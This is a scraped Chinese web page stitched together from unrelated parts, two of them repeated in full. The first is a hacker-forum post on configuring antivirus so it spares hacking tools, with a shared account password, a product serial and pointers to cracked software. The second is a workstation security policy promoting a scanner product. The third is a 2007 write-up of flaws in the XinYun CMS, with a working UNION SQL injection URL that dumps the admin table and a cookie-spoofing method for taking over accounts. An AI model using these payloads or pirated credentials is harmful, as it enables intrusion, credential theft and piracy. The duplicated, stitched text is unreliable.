在这里要说明一点,在文件实时防毒的页面,把发现病毒时的处理方式改为禁止访问
该文件,否则你的黑软会一下子全没了```我以前就知道,不过我朋友前一段时间就
忘了,结果可想而知了```害得他整整郁闷了一个星期~。
卡巴的设置:打开主程序(版本很多,主程序名我也不好说),设置→接下来的
自己找吧,版本太多了,每个都不一样```我也说不清楚。
当然你要想机器平时用的方便,设置更多了,比如江民,瑞星,金山都有自带的
小精灵,小护士,助手什么的,最好别让他们工作,很讨厌(这个词不光女孩子能用
哦,嘿嘿~)。
接下来要提醒大家,如果是搞黑客技术的,最好用GHOST多做几个备份(什么?
不会用GHOST?往下看吧),因为用的软件多了装的太多机器肯定很卡的,这点大家
应该有同感~
至于GHOST的用法(最好自己去网上查,说的比较详细),如果大家不会用DOS,
那就用矮人DOS工具箱5.0,傻瓜化的,适合对DOS不太了解的人`
这里说明大家安装江民后出现的一个严重问题,就是每次开机都扫描硬盘,我看
过网上对这方面的介绍,都不全,而且有一点没有说到,在这里说一下,解决方法是
打开江民的设置选项→扫描选项→其他动作,把四个项目的钩都去掉(每个选项的作
用大家都能读明白吧,我就不详细说了),然后确定,之后打开注册表(单击“开始
→运行”,在“运行”对话框中输入“regedit”打开注册表编辑器)依次选择
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager”然
后在右侧窗口中找到“BootExecute”键值项,右键选择修改,里面数值是
autocheck autochk *
KvNative.exe
把KvNative.exe去掉然后点确定,F5刷新就可以了,以后就不会启动江民自带的开机
扫描了。
大家知道电脑非正常关机的情况下重起电脑以后也会开机扫描,这是很正常的,如果
以后永远不想让电脑开机扫描就把里面的数值全部清空,确定,F5刷新,就可以了
不过建议大家先备份一下注册表再清空里面的数据(因为如果电脑经常非正常关机而
且不开机扫描硬盘,那么会造成硬盘数据破坏后无法删除!),不过清空了也没关系
我们可以用chkdsk命令来强迫电脑开机扫描硬盘,至于chkdsk命令的用法大家就到网
上自己查吧。
最后就是免费升级杀毒软件了
江民:通行证帐号:sphack 密码:sphack 密码改了我也能找回来,因为我知道
用的人多了,升级次数多了,自然就不能升级了,建议大家2天升级一次吧,还有就是
我会陆续更新新的江民通行证,请留意http://www.sphack.cn,谢谢大家支持。
瑞星:序列号: T1BULQ-70AWDE-9P90SF-7TD200?用户ID:RB2NA22T
注意大家千万别点自动升级,因为点自动升级之后就不能用了,大家用瑞星升级保姆
吧,这个保姆是随时更新的,保证用户可以免费升级~下载地址请关注天天杀毒网
http://www.sdday.com,这里有你想要的东东,看了绝对不后悔~
金山:天天杀毒网有破解版的金山2006,如果想用正版的,需要通行证和密码,
不过由于本通行证不随便对外公开,所以暂时不提供。
卡巴:这个好弄,网上到处都有下载,而且有序列号,不过建议大家到天天杀毒网
去下载,因为那里保证下载的东东没问题(现在网络可不安全,危险随时都在),声明
啊,我可不是给天天杀毒网做广告,他可不给我任何好处,只是感觉这个网站有用的东
西太多了。。。
最后给计算机/网络技术初学者一句话,就是遇到问题的时候别总想着去问别人,
自己养成用搜索引擎找答案的习惯,曾经我记得黑客基地的一个VIP会员说过,百度是
你最好的老师~每当我遇到问题的时候,总会想起这句话。
好了,就写这么多吧,打字打的手都酸了,GOOD LUCK !
举凡一般企业当中,除了一些提供网络服务的服务器外,更多数的是一般工作站或可移动的笔记型计算机,亦因其数量远远多过于服务器主机,IT人员可以考虑制定标准的工作站安全政策,利用一些安全设定与保护机制来管理这些有潜在风险的工作站。
我们因着过去的一些经验,提供了一些方向给IT人员参考。
实体的安全
设定使用者授权机制:在企业的网络环境里,可以设定唯有授权的使用者,方可使用企业内部的工作站主机,另外,亦提醒使用者可以启动屏幕保护程序限制未被授权的人无法使用,以保护工作站中所存放的数据。
设定适当的存取控制权限:对于计算机中机密或重要的档案/目录进行权限控制,非授权的使用者无法读取重要的档案,或者亦可考虑利用密码保护功能进行控制。
制定计算机硬件的安装机制:可移动式的储存设备愈来愈普遍化,但随着愈方便地使用亦愈容易成为漏洞的所在,IT人员可以考虑制定硬件管理的机制。
系统的安全设定
重视软件相关的安全修补程序:注意软件开发厂商提供的修补程序,并确实执行修补作业。
安装防毒软件并定期更新病毒码及引击:利用防毒软件进行病毒的防护机制,并确实更新程序,以达到有效的预防。
远程管理的安全性:远程管理工具提供给IT人员一个便利的管道来管理企业中的计算机,但可能一不小心便成为黑客的后门,IT人员需特别注意。
减少不必要的应用程序:这点是老生常谈了,在工作站上只要有不必要的应用程序,就将它移除或停止启动。
数据的保护
定期执行备份工作:工作站上重要的档案需定期执行备份或者将档案备份到企业的档案伺服主机。
知识的传达
提升使用者对安全的认知:因为并非每个使用者都有IT人员的专业资安概念,所以,IT人员可善用一些机会,给予一般使用者信息安全的认知与概念。
善用工作站管理程序,统一管理企业计算机软硬件:对于IT人员,可以善用管理程序来管理企业内部的软硬件,找出是否有工作站安装了未经授权的软件,或执行不安全的软件。
不随意下载或执行来源不明的档案或程序:提醒每个使用者不要执行来路不明的程序,减少一些资安上的风险。
透过 DragonSoft Secure Scanner(DSS) 检查您企业中的工作站是否安装或启动哪些未经授权的软件。
进行一个安全检测,并采用"一般检测"政策,检测目标选择您欲检查的主机,您可以分不同部门来进行检测作业,届时针对不同部门给予建议等。
按下工具列上的开始按钮进行检测。
检测完成后,按下工具列上的报表按钮,进行报表产生。
报表产生后,其中一部份就是记录着被检测主机上的服务信息,依着报告您即可提醒公司内部人员,进行修正,以符合公司所订定的安全政策。
我们因着过去的一些经验,提供了一些方向给IT人员参考。
实体的安全
设定使用者授权机制:在企业的网络环境里,可以设定唯有授权的使用者,方可使用企业内部的工作站主机,另外,亦提醒使用者可以启动屏幕保护程序限制未被授权的人无法使用,以保护工作站中所存放的数据。
设定适当的存取控制权限:对于计算机中机密或重要的档案/目录进行权限控制,非授权的使用者无法读取重要的档案,或者亦可考虑利用密码保护功能进行控制。
制定计算机硬件的安装机制:可移动式的储存设备愈来愈普遍化,但随着愈方便地使用亦愈容易成为漏洞的所在,IT人员可以考虑制定硬件管理的机制。
系统的安全设定
重视软件相关的安全修补程序:注意软件开发厂商提供的修补程序,并确实执行修补作业。
安装防毒软件并定期更新病毒码及引击:利用防毒软件进行病毒的防护机制,并确实更新程序,以达到有效的预防。
远程管理的安全性:远程管理工具提供给IT人员一个便利的管道来管理企业中的计算机,但可能一不小心便成为黑客的后门,IT人员需特别注意。
减少不必要的应用程序:这点是老生常谈了,在工作站上只要有不必要的应用程序,就将它移除或停止启动。
数据的保护
定期执行备份工作:工作站上重要的档案需定期执行备份或者将档案备份到企业的档案伺服主机。
知识的传达
提升使用者对安全的认知:因为并非每个使用者都有IT人员的专业资安概念,所以,IT人员可善用一些机会,给予一般使用者信息安全的认知与概念。
善用工作站管理程序,统一管理企业计算机软硬件:对于IT人员,可以善用管理程序来管理企业内部的软硬件,找出是否有工作站安装了未经授权的软件,或执行不安全的软件。
不随意下载或执行来源不明的档案或程序:提醒每个使用者不要执行来路不明的程序,减少一些资安上的风险。
透过 DragonSoft Secure Scanner(DSS) 检查您企业中的工作站是否安装或启动哪些未经授权的软件。
进行一个安全检测,并采用"一般检测"政策,检测目标选择您欲检查的主机,您可以分不同部门来进行检测作业,届时针对不同部门给予建议等。
按下工具列上的开始按钮进行检测。
检测完成后,按下工具列上的报表按钮,进行报表产生。
报表产生后,其中一部份就是记录着被检测主机上的服务信息,依着报告您即可提醒公司内部人员,进行修正,以符合公司所订定的安全政策。
新云网站管理系统文件注入漏洞
[ 2007-03-25 03:49:51 | 作者: sun ]
关于新云
新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。
漏洞原理
利用各种方法实现入侵,如COOKIES、抓包、注入检测等。
1.过滤未全
user\articlepost.asp 文件第333行
Quote
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")
没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入,就可以爆出管理员的表和代码。
2.新云2.1SQL版注入漏洞
漏洞描述:
动画频道的“动画管理”和“审核管理”,错误类型:
Quote
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存储过程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺骗获取管理账号
攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。
新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。
漏洞原理
利用各种方法实现入侵,如COOKIES、抓包、注入检测等。
1.过滤未全
user\articlepost.asp 文件第333行
Quote
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")
没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入,就可以爆出管理员的表和代码。
2.新云2.1SQL版注入漏洞
漏洞描述:
动画频道的“动画管理”和“审核管理”,错误类型:
Quote
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存储过程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺骗获取管理账号
攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。
